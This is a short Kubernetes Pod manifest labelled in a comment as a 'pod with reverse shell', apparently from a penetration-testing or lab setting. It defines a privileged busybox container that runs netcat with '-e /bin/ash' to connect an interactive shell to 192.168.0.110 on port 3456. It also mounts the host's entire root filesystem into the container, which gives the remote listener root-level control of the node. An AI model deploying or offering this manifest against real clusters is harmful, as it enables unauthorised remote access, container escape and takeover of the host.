# pod with reverse she]l
apiVersion: v1
kind: Pod
metadata:
  name: busybox
  namespace: dev
spec:
  containers:
    - name: busybox
      image: busybox
      stdin: true
      tty: true
      command:
        - /bin/nc
        - "192.168.0.110"
        - "3456"
        - "-e"
        - /bin/ash
        - "-i"
      securityContext:
        privileged: true
      volumeMounts:
        - mountPath: /host
          name: hostvolume
  volumes:
    - name: hostvolume
      hostPath:
        path: /
        type: Directory
  restartPolicy: Never
